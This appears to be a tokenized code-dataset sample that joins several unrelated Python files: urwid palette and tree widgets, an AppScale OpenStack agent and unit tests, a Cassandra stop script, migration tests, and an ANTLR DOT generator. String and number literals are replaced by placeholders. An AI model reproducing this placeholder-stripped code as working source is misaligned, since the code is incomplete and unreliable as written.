foreground , background , <EOL> mono = None , foreground_high = None , background_high = None ) : <EOL> """<STR_LIT>""" <EOL> basic = AttrSpec ( foreground , background , <NUM_LIT:16> ) <EOL> if type ( mono ) == tuple : <EOL> mono = "<STR_LIT:U+002C>" . join ( mono ) <EOL> if mono is None : <EOL> mono = DEFAULT <EOL> mono = AttrSpec ( mono , DEFAULT , <NUM_LIT:1> ) <EOL> if foreground_high is None : <EOL> foreground_high = foreground <EOL> if background_high is None : <EOL> background_high = background <EOL> high_256 = AttrSpec ( foreground_high , background_high , <NUM_LIT> ) <EOL> def large_h ( desc ) : <EOL> if not desc . 
startswith ( '<STR_LIT:h>' ) : <EOL> return False <EOL> num = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> return num > <NUM_LIT:15> <EOL> if large_h ( foreground_high ) or large_h ( background_high ) : <EOL> high_88 = basic <EOL> else : <EOL> high_88 = AttrSpec ( foreground_high , background_high , <NUM_LIT> ) <EOL> signals . emit_signal ( self , UPDATE_PALETTE_ENTRY , <EOL> name , basic , mono , high_88 , high_256 ) <EOL> self . _palette [ name ] = ( basic , mono , high_88 , high_256 ) <EOL> def _test ( ) : <EOL> import doctest <EOL> doctest . testmod ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) </s>
<s> """<STR_LIT>""" <EOL> import urwid <EOL> from urwid . wimp import SelectableIcon <EOL> class TreeWidgetError ( RuntimeError ) : <EOL> pass <EOL> class TreeWidget ( urwid . WidgetWrap ) : <EOL> """<STR_LIT>""" <EOL> indent_cols = <NUM_LIT:3> <EOL> unexpanded_icon = SelectableIcon ( '<STR_LIT:+>' , <NUM_LIT:0> ) <EOL> expanded_icon = SelectableIcon ( '<STR_LIT:->' , <NUM_LIT:0> ) <EOL> def __init__ ( self , node ) : <EOL> self . _node = node <EOL> self . _innerwidget = None <EOL> self . is_leaf = not hasattr ( node , '<STR_LIT>' ) <EOL> self . expanded = True <EOL> widget = self . get_indented_widget ( ) <EOL> self . __super . __init__ ( widget ) <EOL> def selectable ( self ) : <EOL> """<STR_LIT>""" <EOL> return not self . is_leaf <EOL> def get_indented_widget ( self ) : <EOL> widget = self . get_inner_widget ( ) <EOL> if not self . is_leaf : <EOL> widget = urwid . Columns ( [ ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> [ self . unexpanded_icon , self . expanded_icon ] [ self . expanded ] ) , <EOL> widget ] , dividechars = <NUM_LIT:1> ) <EOL> indent_cols = self . get_indent_cols ( ) <EOL> return urwid . Padding ( widget , <EOL> width = ( '<STR_LIT>' , <NUM_LIT:100> ) , left = indent_cols ) <EOL> def update_expanded_icon ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _w . base_widget . widget_list [ <NUM_LIT:0> ] = [ <EOL> self . unexpanded_icon , self . expanded_icon ] [ self . expanded ] <EOL> def get_indent_cols ( self ) : <EOL> return self . indent_cols * self . get_node ( ) . get_depth ( ) <EOL> def get_inner_widget ( self ) : <EOL> if self . _innerwidget is None : <EOL> self . _innerwidget = self . load_inner_widget ( ) <EOL> return self . _innerwidget <EOL> def load_inner_widget ( self ) : <EOL> return urwid . Text ( self . get_display_text ( ) ) <EOL> def get_node ( self ) : <EOL> return self . _node <EOL> def get_display_text ( self ) : <EOL> return ( self . get_node ( ) . get_key ( ) + "<STR_LIT>" + <EOL> str ( self . get_node ( ) . 
get_value ( ) ) ) <EOL> def next_inorder ( self ) : <EOL> """<STR_LIT>""" <EOL> firstchild = self . first_child ( ) <EOL> if firstchild is not None : <EOL> return firstchild <EOL> thisnode = self . get_node ( ) <EOL> nextnode = thisnode . next_sibling ( ) <EOL> depth = thisnode . get_depth ( ) <EOL> while nextnode is None and depth > <NUM_LIT:0> : <EOL> thisnode = thisnode . get_parent ( ) <EOL> nextnode = thisnode . next_sibling ( ) <EOL> depth -= <NUM_LIT:1> <EOL> assert depth == thisnode . get_depth ( ) <EOL> if nextnode is None : <EOL> return None <EOL> else : <EOL> return nextnode . get_widget ( ) <EOL> def prev_inorder ( self ) : <EOL> """<STR_LIT>""" <EOL> thisnode = self . _node <EOL> prevnode = thisnode . prev_sibling ( ) <EOL> if prevnode is not None : <EOL> prevwidget = prevnode . get_widget ( ) <EOL> lastchild = prevwidget . last_child ( ) <EOL> if lastchild is None : <EOL> return prevwidget <EOL> else : <EOL> return lastchild <EOL> else : <EOL> depth = thisnode . get_depth ( ) <EOL> if prevnode is None and depth == <NUM_LIT:0> : <EOL> return None <EOL> elif prevnode is None : <EOL> prevnode = thisnode . get_parent ( ) <EOL> return prevnode . get_widget ( ) <EOL> def keypress ( self , size , key ) : <EOL> """<STR_LIT>""" <EOL> if self . is_leaf : <EOL> return key <EOL> if key in ( "<STR_LIT:+>" , "<STR_LIT:right>" ) : <EOL> self . expanded = True <EOL> self . update_expanded_icon ( ) <EOL> elif key == "<STR_LIT:->" : <EOL> self . expanded = False <EOL> self . update_expanded_icon ( ) <EOL> elif self . _w . selectable ( ) : <EOL> return self . __super . keypress ( size , key ) <EOL> else : <EOL> return key <EOL> def mouse_event ( self , size , event , button , col , row , focus ) : <EOL> if self . is_leaf or event != '<STR_LIT>' or button != <NUM_LIT:1> : <EOL> return False <EOL> if row == <NUM_LIT:0> and col == self . get_indent_cols ( ) : <EOL> self . expanded = not self . expanded <EOL> self . 
update_expanded_icon ( ) <EOL> return True <EOL> return False <EOL> def first_child ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_leaf or not self . expanded : <EOL> return None <EOL> else : <EOL> if self . _node . has_children ( ) : <EOL> firstnode = self . _node . get_first_child ( ) <EOL> return firstnode . get_widget ( ) <EOL> else : <EOL> return None <EOL> def last_child ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_leaf or not self . expanded : <EOL> return None <EOL> else : <EOL> if self . _node . has_children ( ) : <EOL> lastchild = self . _node . get_last_child ( ) . get_widget ( ) <EOL> else : <EOL> return None <EOL> lastdescendant = lastchild . last_child ( ) <EOL> if lastdescendant is None : <EOL> return lastchild <EOL> else : <EOL> return lastdescendant <EOL> class TreeNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , parent = None , key = None , depth = None ) : <EOL> self . _key = key <EOL> self . _parent = parent <EOL> self . _value = value <EOL> self . _depth = depth <EOL> self . _widget = None <EOL> def get_widget ( self , reload = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _widget is None or reload == True : <EOL> self . _widget = self . load_widget ( ) <EOL> return self . _widget <EOL> def load_widget ( self ) : <EOL> return TreeWidget ( self ) <EOL> def get_depth ( self ) : <EOL> if self . _depth is None and self . _parent is None : <EOL> self . _depth = <NUM_LIT:0> <EOL> elif self . _depth is None : <EOL> self . _depth = self . _parent . get_depth ( ) + <NUM_LIT:1> <EOL> return self . _depth <EOL> def get_index ( self ) : <EOL> if self . get_depth ( ) == <NUM_LIT:0> : <EOL> return None <EOL> else : <EOL> key = self . get_key ( ) <EOL> parent = self . get_parent ( ) <EOL> return parent . get_child_index ( key ) <EOL> def get_key ( self ) : <EOL> return self . _key <EOL> def set_key ( self , key ) : <EOL> self . _key = key <EOL> def change_key ( self , key ) : <EOL> self . get_parent ( ) . 
change_child_key ( self . _key , key ) <EOL> def get_parent ( self ) : <EOL> if self . _parent == None and self . get_depth ( ) > <NUM_LIT:0> : <EOL> self . _parent = self . load_parent ( ) <EOL> return self . _parent <EOL> def load_parent ( self ) : <EOL> """<STR_LIT>""" <EOL> raise TreeWidgetError ( "<STR_LIT>" ) <EOL> def get_value ( self ) : <EOL> return self . _value <EOL> def is_root ( self ) : <EOL> return self . get_depth ( ) == <NUM_LIT:0> <EOL> def next_sibling ( self ) : <EOL> if self . get_depth ( ) > <NUM_LIT:0> : <EOL> return self . get_parent ( ) . next_child ( self . get_key ( ) ) <EOL> else : <EOL> return None <EOL> def prev_sibling ( self ) : <EOL> if self . get_depth ( ) > <NUM_LIT:0> : <EOL> return self . get_parent ( ) . prev_child ( self . get_key ( ) ) <EOL> else : <EOL> return None <EOL> def get_root ( self ) : <EOL> root = self <EOL> while root . get_parent ( ) is not None : <EOL> root = root . get_parent ( ) <EOL> return root <EOL> class ParentNode ( TreeNode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , parent = None , key = None , depth = None ) : <EOL> TreeNode . __init__ ( self , value , parent = parent , key = key , depth = depth ) <EOL> self . _child_keys = None <EOL> self . _children = { } <EOL> def get_child_keys ( self , reload = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _child_keys is None or reload == True : <EOL> self . _child_keys = self . load_child_keys ( ) <EOL> return self . _child_keys <EOL> def load_child_keys ( self ) : <EOL> """<STR_LIT>""" <EOL> raise TreeWidgetError ( "<STR_LIT>" ) <EOL> def get_child_widget ( self , key ) : <EOL> """<STR_LIT>""" <EOL> child = self . get_child_node ( key ) <EOL> return child . get_widget ( ) <EOL> def get_child_node ( self , key , reload = False ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . _children or reload == True : <EOL> self . _children [ key ] = self . load_child_node ( key ) <EOL> return self . 
_children [ key ] <EOL> def load_child_node ( self , key ) : <EOL> """<STR_LIT>""" <EOL> raise TreeWidgetError ( "<STR_LIT>" ) <EOL> def set_child_node ( self , key , node ) : <EOL> """<STR_LIT>""" <EOL> self . _children [ key ] = node <EOL> def change_child_key ( self , oldkey , newkey ) : <EOL> if newkey in self . _children : <EOL> raise TreeWidgetError ( "<STR_LIT>" % newkey ) <EOL> self . _children [ newkey ] = self . _children . pop ( oldkey ) <EOL> self . _children [ newkey ] . set_key ( newkey ) <EOL> def get_child_index ( self , key ) : <EOL> try : <EOL> return self . get_child_keys ( ) . index ( key ) <EOL> except ValueError : <EOL> errorstring = ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> raise TreeWidgetError ( errorstring % ( key , self . get_key ( ) , <EOL> str ( self . get_child_keys ( ) ) ) ) <EOL> def next_child ( self , key ) : <EOL> """<STR_LIT>""" <EOL> index = self . get_child_index ( key ) <EOL> if index is None : <EOL> return None <EOL> index += <NUM_LIT:1> <EOL> child_keys = self . get_child_keys ( ) <EOL> if index < len ( child_keys ) : <EOL> return self . get_child_node ( child_keys [ index ] ) <EOL> else : <EOL> return None <EOL> def prev_child ( self , key ) : <EOL> """<STR_LIT>""" <EOL> index = self . get_child_index ( key ) <EOL> if index is None : <EOL> return None <EOL> child_keys = self . get_child_keys ( ) <EOL> index -= <NUM_LIT:1> <EOL> if index >= <NUM_LIT:0> : <EOL> return self . get_child_node ( child_keys [ index ] ) <EOL> else : <EOL> return None <EOL> def get_first_child ( self ) : <EOL> """<STR_LIT>""" <EOL> child_keys = self . get_child_keys ( ) <EOL> return self . get_child_node ( child_keys [ <NUM_LIT:0> ] ) <EOL> def get_last_child ( self ) : <EOL> """<STR_LIT>""" <EOL> child_keys = self . get_child_keys ( ) <EOL> return self . get_child_node ( child_keys [ - <NUM_LIT:1> ] ) <EOL> def has_children ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . get_child_keys ( ) ) > <NUM_LIT:0> <EOL> class TreeWalker ( urwid . 
ListWalker ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , start_from ) : <EOL> """<STR_LIT>""" <EOL> self . focus = start_from <EOL> def get_focus ( self ) : <EOL> widget = self . focus . get_widget ( ) <EOL> return widget , self . focus <EOL> def set_focus ( self , focus ) : <EOL> self . focus = focus <EOL> self . _modified ( ) <EOL> def get_next ( self , start_from ) : <EOL> widget = start_from . get_widget ( ) <EOL> target = widget . next_inorder ( ) <EOL> if target is None : <EOL> return None , None <EOL> else : <EOL> return target , target . get_node ( ) <EOL> def get_prev ( self , start_from ) : <EOL> widget = start_from . get_widget ( ) <EOL> target = widget . prev_inorder ( ) <EOL> if target is None : <EOL> return None , None <EOL> else : <EOL> return target , target . get_node ( ) <EOL> class TreeListBox ( urwid . ListBox ) : <EOL> """<STR_LIT>""" <EOL> def keypress ( self , size , key ) : <EOL> key = self . __super . keypress ( size , key ) <EOL> return self . unhandled_input ( size , key ) <EOL> def unhandled_input ( self , size , input ) : <EOL> """<STR_LIT>""" <EOL> if input == '<STR_LIT:left>' : <EOL> self . move_focus_to_parent ( size ) <EOL> elif input == '<STR_LIT:->' : <EOL> self . collapse_focus_parent ( size ) <EOL> elif input == '<STR_LIT>' : <EOL> self . focus_home ( size ) <EOL> elif input == '<STR_LIT:end>' : <EOL> self . focus_end ( size ) <EOL> else : <EOL> return input <EOL> def collapse_focus_parent ( self , size ) : <EOL> """<STR_LIT>""" <EOL> widget , pos = self . body . get_focus ( ) <EOL> self . move_focus_to_parent ( size ) <EOL> pwidget , ppos = self . body . get_focus ( ) <EOL> if pos != ppos : <EOL> self . keypress ( size , "<STR_LIT:->" ) <EOL> def move_focus_to_parent ( self , size ) : <EOL> """<STR_LIT>""" <EOL> widget , pos = self . body . get_focus ( ) <EOL> parentpos = pos . get_parent ( ) <EOL> if parentpos is None : <EOL> return <EOL> middle , top , bottom = self . 
calculate_visible ( size ) <EOL> row_offset , focus_widget , focus_pos , focus_rows , cursor = middle <EOL> trim_top , fill_above = top <EOL> for widget , pos , rows in fill_above : <EOL> row_offset -= rows <EOL> if pos == parentpos : <EOL> self . change_focus ( size , pos , row_offset ) <EOL> return <EOL> self . change_focus ( size , pos . get_parent ( ) ) <EOL> def focus_home ( self , size ) : <EOL> """<STR_LIT>""" <EOL> widget , pos = self . body . get_focus ( ) <EOL> rootnode = pos . get_root ( ) <EOL> self . change_focus ( size , rootnode ) <EOL> def focus_end ( self , size ) : <EOL> """<STR_LIT>""" <EOL> maxrow , maxcol = size <EOL> widget , pos = self . body . get_focus ( ) <EOL> rootnode = pos . get_root ( ) <EOL> rootwidget = rootnode . get_widget ( ) <EOL> lastwidget = rootwidget . last_child ( ) <EOL> lastnode = lastwidget . get_node ( ) <EOL> self . change_focus ( size , lastnode , maxrow - <NUM_LIT:1> ) </s>
<s> from appenlight_client . utils import import_module , deco_func_or_method <EOL> from appenlight_client . timing import time_trace <EOL> ignore_set = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def add_timing ( min_duration = <NUM_LIT:3> ) : <EOL> module = import_module ( '<STR_LIT>' ) <EOL> if not module : <EOL> return <EOL> def gather_args_host ( c ) : <EOL> return { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : c . host , <EOL> '<STR_LIT:count>' : True , <EOL> '<STR_LIT>' : ignore_set } <EOL> def gather_args_sslhost ( c ) : <EOL> return { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : c . host , <EOL> '<STR_LIT:count>' : True , <EOL> '<STR_LIT>' : ignore_set } <EOL> deco_func_or_method ( module , '<STR_LIT>' , time_trace , <EOL> gatherer = gather_args_host , min_duration = min_duration ) <EOL> deco_func_or_method ( module , '<STR_LIT>' , time_trace , <EOL> gatherer = gather_args_sslhost , min_duration = min_duration ) </s>
<s> """<STR_LIT>""" <EOL> from ec2_agent import EC2Agent <EOL> import boto <EOL> import time <EOL> from urlparse import urlparse <EOL> __author__ = '<STR_LIT>' <EOL> __email__ = '<STR_LIT>' <EOL> class OpenStackAgent ( EC2Agent ) : <EOL> """<STR_LIT>""" <EOL> REQUIRED_OPENSTACK_CREDENTIALS = list ( EC2Agent . REQUIRED_EC2_CREDENTIALS ) + [ '<STR_LIT>' ] <EOL> REQUIRED_CREDENTIALS = REQUIRED_OPENSTACK_CREDENTIALS <EOL> DEFAULT_REGION = "<STR_LIT>" <EOL> def describe_instances ( self , parameters , pending = False ) : <EOL> """<STR_LIT>""" <EOL> instance_ids = [ ] <EOL> public_ips = [ ] <EOL> private_ips = [ ] <EOL> conn = self . open_connection ( parameters ) <EOL> reservations = conn . get_all_instances ( ) <EOL> instances = [ i for r in reservations for i in r . instances ] <EOL> for i in instances : <EOL> if ( i . state == '<STR_LIT>' or ( pending and i . state == '<STR_LIT>' ) ) and i . key_name . startswith ( parameters [ self . PARAM_KEYNAME ] ) : <EOL> instance_ids . append ( i . id ) <EOL> public_ips . append ( i . public_dns_name ) <EOL> private_ips . append ( i . private_dns_name ) <EOL> return public_ips , private_ips , instance_ids <EOL> def open_connection ( self , parameters ) : <EOL> """<STR_LIT>""" <EOL> credentials = parameters [ self . PARAM_CREDENTIALS ] <EOL> region_str = self . DEFAULT_REGION <EOL> access_key = str ( credentials [ '<STR_LIT>' ] ) <EOL> secret_key = str ( credentials [ '<STR_LIT>' ] ) <EOL> ec2_url = str ( credentials [ '<STR_LIT>' ] ) <EOL> result = urlparse ( ec2_url ) <EOL> if result . port is None or result . hostname is None or result . path is None : <EOL> self . handle_failure ( '<STR_LIT>' + '<STR_LIT>' . format ( result . geturl ( ) ) ) <EOL> return None <EOL> region = boto . ec2 . regioninfo . RegionInfo ( name = region_str , <EOL> endpoint = result . hostname ) <EOL> return boto . connect_ec2 ( aws_access_key_id = access_key , <EOL> aws_secret_access_key = secret_key , <EOL> is_secure = ( result . 
scheme == '<STR_LIT>' ) , <EOL> region = region , <EOL> port = result . port , <EOL> path = result . path , debug = <NUM_LIT:2> ) <EOL> def wait_for_status_change ( self , parameters , conn , state_requested , <EOL> max_wait_time = <NUM_LIT> , poll_interval = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> time_start = time . time ( ) <EOL> instance_ids = parameters [ self . PARAM_INSTANCE_IDS ] <EOL> instances_in_state = { } <EOL> while True : <EOL> time . sleep ( poll_interval ) <EOL> reservations = conn . get_all_instances ( instance_ids ) <EOL> instances = [ i for r in reservations for i in r . instances ] <EOL> for i in instances : <EOL> if i . state == state_requested and i . key_name . startswith ( parameters [ self . PARAM_KEYNAME ] ) : <EOL> if i . id not in instances_in_state . keys ( ) : <EOL> instances_in_state [ i . id ] = <NUM_LIT:1> <EOL> if len ( instances_in_state . keys ( ) ) >= len ( instance_ids ) : <EOL> return True <EOL> if time . time ( ) - time_start > max_wait_time : <EOL> return False </s>
<s> import json <EOL> import os <EOL> import sys <EOL> import time <EOL> import unittest <EOL> from flexmock import flexmock <EOL> import SOAPpy <EOL> lib = os . path . dirname ( __file__ ) + os . sep + "<STR_LIT:..>" + os . sep + "<STR_LIT>" <EOL> sys . path . append ( lib ) <EOL> from appscale_logger import AppScaleLogger <EOL> from appscale_tools import AppScaleTools <EOL> from local_state import LocalState <EOL> from parse_args import ParseArgs <EOL> class TestAppScaleSetProperty ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . keyname = "<STR_LIT>" <EOL> self . function = "<STR_LIT>" <EOL> flexmock ( AppScaleLogger ) <EOL> AppScaleLogger . should_receive ( '<STR_LIT>' ) . and_return ( ) <EOL> AppScaleLogger . should_receive ( '<STR_LIT:success>' ) . and_return ( ) <EOL> AppScaleLogger . should_receive ( '<STR_LIT>' ) . and_return ( ) <EOL> flexmock ( time ) <EOL> time . should_receive ( '<STR_LIT>' ) . and_return ( ) <EOL> def test_get_property ( self ) : <EOL> builtins = flexmock ( sys . modules [ '<STR_LIT>' ] ) <EOL> builtins . should_call ( '<STR_LIT>' ) <EOL> secret_key_location = LocalState . get_secret_key_location ( self . keyname ) <EOL> fake_secret = flexmock ( name = "<STR_LIT>" ) <EOL> fake_secret . should_receive ( '<STR_LIT>' ) . and_return ( '<STR_LIT>' ) <EOL> builtins . should_receive ( '<STR_LIT>' ) . with_args ( secret_key_location , '<STR_LIT:r>' ) . and_return ( fake_secret ) <EOL> flexmock ( os . path ) <EOL> os . path . should_call ( '<STR_LIT>' ) <EOL> os . path . should_receive ( '<STR_LIT>' ) . with_args ( <EOL> LocalState . get_locations_json_location ( self . keyname ) ) . and_return ( True ) <EOL> fake_nodes_json = flexmock ( name = "<STR_LIT>" ) <EOL> fake_nodes_json . should_receive ( '<STR_LIT>' ) . and_return ( json . dumps ( [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } ] ) ) <EOL> builtins . should_receive ( '<STR_LIT>' ) . 
with_args ( <EOL> LocalState . get_locations_json_location ( self . keyname ) , '<STR_LIT:r>' ) . and_return ( fake_nodes_json ) <EOL> property_name = "<STR_LIT:name>" <EOL> property_value = "<STR_LIT:value>" <EOL> fake_appcontroller = flexmock ( name = '<STR_LIT>' ) <EOL> fake_appcontroller . should_receive ( '<STR_LIT>' ) . with_args ( property_name , <EOL> property_value , '<STR_LIT>' ) . and_return ( '<STR_LIT:OK>' ) <EOL> flexmock ( SOAPpy ) <EOL> SOAPpy . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' ) . and_return ( fake_appcontroller ) <EOL> argv = [ <EOL> "<STR_LIT>" , self . keyname , <EOL> "<STR_LIT>" , property_name , <EOL> "<STR_LIT>" , property_value <EOL> ] <EOL> options = ParseArgs ( argv , self . function ) . args <EOL> result = AppScaleTools . set_property ( options ) <EOL> self . assertEqual ( None , result ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import os <EOL> import sys <EOL> import cassandra_interface <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) <EOL> import monit_interface <EOL> def run ( ) : <EOL> """<STR_LIT>""" <EOL> logging . warning ( "<STR_LIT>" ) <EOL> monit_interface . stop ( <EOL> cassandra_interface . CASSANDRA_MONIT_WATCH_NAME , is_group = False ) <EOL> logging . warning ( "<STR_LIT>" ) <EOL> return True <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run ( ) </s>
<s> import os <EOL> import unittest <EOL> import subprocess <EOL> from migration import * <EOL> from dbconstants import * <EOL> TEST_TAR = '<STR_LIT>' <EOL> class SecretTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . removeSecret = False <EOL> try : <EOL> FILE = open ( SECRET_LOCATION , '<STR_LIT:r>' ) <EOL> self . secret = FILE . read ( ) <EOL> FILE . close ( ) <EOL> except : <EOL> self . removeSecret = True <EOL> FILE = open ( SECRET_LOCATION , '<STR_LIT:w>' ) <EOL> self . secret = '<STR_LIT:x>' <EOL> FILE . write ( self . secret ) <EOL> FILE . close ( ) <EOL> def runTest ( self ) : <EOL> assert secret_check ( self . secret ) <EOL> assert not secret_check ( self . secret + '<STR_LIT:x>' ) <EOL> assert not secret_check ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> if self . removeSecret : <EOL> os . remove ( SECRET_LOCATION ) <EOL> class MD5TestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> process = subprocess . Popen ( [ '<STR_LIT>' , TEST_TAR ] , <EOL> shell = False , <EOL> stdout = subprocess . PIPE ) <EOL> output = process . communicate ( ) [ <NUM_LIT:0> ] <EOL> self . md5sum = output . split ( ) [ <NUM_LIT:0> ] <EOL> def runTest ( self ) : <EOL> assert md5_check ( TEST_TAR , self . md5sum ) <EOL> assert not md5_check ( TEST_TAR , self . md5sum + "<STR_LIT:1>" ) <EOL> class TarTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> full_list = os . listdir ( '<STR_LIT>' ) <EOL> self . file_list = [ ] <EOL> self . tarname = '<STR_LIT>' <EOL> tar = tarfile . open ( self . tarname , '<STR_LIT>' ) <EOL> tar . add ( '<STR_LIT>' ) <EOL> self . file_list . append ( '<STR_LIT>' ) <EOL> tar . close ( ) <EOL> def runTest ( self ) : <EOL> self . assertEquals ( untar_file ( self . tarname ) , self . file_list ) <EOL> def tearDown ( self ) : <EOL> remove_tar ( '<STR_LIT>' ) <EOL> remove_tar ( '<STR_LIT>' + self . tarname ) <EOL> class TestDataCase ( unittest . 
TestCase ) : <EOL> def runTest ( self ) : <EOL> assert untar_file ( TEST_TAR ) != [ ] <EOL> class DataLoadCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . data_file = untar_file ( TEST_TAR ) [ <NUM_LIT:0> ] <EOL> self . data = get_file_buffer ( self . data_file ) <EOL> def runTest ( self ) : <EOL> dict_data = get_dictionary ( self . data ) <EOL> assert dict_data != [ ] <EOL> trans , nontrans = dict_transform ( dict_data ) <EOL> class TableTesting ( unittest . TestCase ) : <EOL> def runTest ( self ) : <EOL> assert is_non_trans_table ( "<STR_LIT>" ) <EOL> assert is_non_trans_table ( "<STR_LIT>" ) <EOL> assert is_non_trans_table ( "<STR_LIT>" ) <EOL> assert is_non_trans_table ( "<STR_LIT>" ) <EOL> assert not is_non_trans_table ( "<STR_LIT>" ) <EOL> self . assertEquals ( get_table ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> self . assertEquals ( get_table ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> self . assertEquals ( get_root_key_table_appid ( "<STR_LIT>" ) , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEquals ( get_table ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . _internal . antlr3 . tree import CommonTreeAdaptor <EOL> import stringtemplate3 <EOL> class DOTTreeGenerator ( object ) : <EOL> """<STR_LIT>""" <EOL> _treeST = stringtemplate3 . StringTemplate ( <EOL> template = ( <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> ) <EOL> _nodeST = stringtemplate3 . StringTemplate ( <EOL> template = "<STR_LIT>" <EOL> ) <EOL> _edgeST = stringtemplate3 . StringTemplate ( <EOL> template = "<STR_LIT>" <EOL> ) <EOL> def __init__ ( self ) : <EOL> self . nodeToNumberMap = { } <EOL> self . nodeNumber = <NUM_LIT:0> <EOL> def toDOT ( self , tree , adaptor = None , treeST = _treeST , edgeST = _edgeST ) : <EOL> if adaptor is None : <EOL> adaptor = CommonTreeAdaptor ( ) <EOL> treeST = treeST . getInstanceOf ( ) <EOL> self . nodeNumber = <NUM_LIT:0> <EOL> self . toDOTDefineNodes ( tree , adaptor , treeST ) <EOL> self . nodeNumber = <NUM_LIT:0> <EOL> self . toDOTDefineEdges ( tree , adaptor , treeST , edgeST ) <EOL> return treeST <EOL> def toDOTDefineNodes ( self , tree , adaptor , treeST , knownNodes = None ) : <EOL> if knownNodes is None : <EOL> knownNodes = set ( ) <EOL> if tree is None : <EOL> return <EOL> n = adaptor . getChildCount ( tree ) <EOL> if n == <NUM_LIT:0> : <EOL> return <EOL> number = self . getNodeNumber ( tree ) <EOL> if number not in knownNodes : <EOL> parentNodeST = self . getNodeST ( adaptor , tree ) <EOL> treeST . setAttribute ( "<STR_LIT>" , parentNodeST ) <EOL> knownNodes . add ( number ) <EOL> for i in range ( n ) : <EOL> child = adaptor . getChild ( tree , i ) <EOL> number = self . getNodeNumber ( child ) <EOL> if number not in knownNodes : <EOL> nodeST = self . getNodeST ( adaptor , child ) <EOL> treeST . setAttribute ( "<STR_LIT>" , nodeST ) <EOL> knownNodes . add ( number ) <EOL> self . 
toDOTDefineNodes ( child , adaptor , treeST , knownNodes ) <EOL> def toDOTDefineEdges ( self , tree , adaptor , treeST , edgeST ) : <EOL> if tree is None : <EOL> return <EOL> n = adaptor . getChildCount ( tree ) <EOL> if n == <NUM_LIT:0> : <EOL> return <EOL> parentName = "<STR_LIT>" % self . getNodeNumber ( tree ) <EOL> parentText = adaptor . getText ( tree ) <EOL> for i in range ( n ) : <EOL> child = adaptor . getChild ( tree , i ) <EOL> childText = adaptor . getText ( child ) <EOL> childName = "<STR_LIT>" % self . getNodeNumber ( child ) <EOL> edgeST = edgeST . getInstanceOf ( ) <EOL> edgeST . setAttribute ( "<STR_LIT>" , parentName ) <EOL> edgeST . setAttribute ( "<STR_LIT>" , childName ) <EOL> edgeST . setAttribute ( "<STR_LIT>" , parentText ) <EOL> edgeST . setAttribute ( "<STR_LIT>" , childText ) <EOL> treeST . setAttribute ( "<STR_LIT>" , edgeST ) <EOL> self . toDOTDefineEdges ( child , adaptor , treeST , edgeST ) <EOL> def getNodeST ( self , adaptor , t ) : <EOL> text = adaptor . getText ( t ) <EOL> nodeST = self . _nodeST . getInstanceOf ( ) <EOL> uniqueName = "<STR_LIT>" % self . getNodeNumber ( t ) <EOL> nodeST . setAttribute ( "<STR_LIT:name>" , uniqueName ) <EOL> if text is not None : <EOL> text = text . replace ( '<STR_LIT:">' , r'<STR_LIT>' ) <EOL> nodeST . setAttribute ( "<STR_LIT:text>" , text ) <EOL> return nodeST <EOL> def getNodeNumber ( self , t ) : <EOL> try : <EOL> return self . nodeToNumberMap [ t ] <EOL> except KeyError : <EOL> self . nodeToNumberMap [ t ] = self . nodeNumber <EOL> self . nodeNumber += <NUM_LIT:1> <EOL> return self . nodeNumber - <NUM_LIT:1> <EOL> def toDOT ( tree , adaptor = None , treeST = DOTTreeGenerator . _treeST , edgeST = DOTTreeGenerator . _edgeST ) : <EOL> """<STR_LIT>""" <EOL> gen = DOTTreeGenerator ( ) <EOL> return gen . toDOT ( tree , adaptor , treeST , edgeST ) </s>
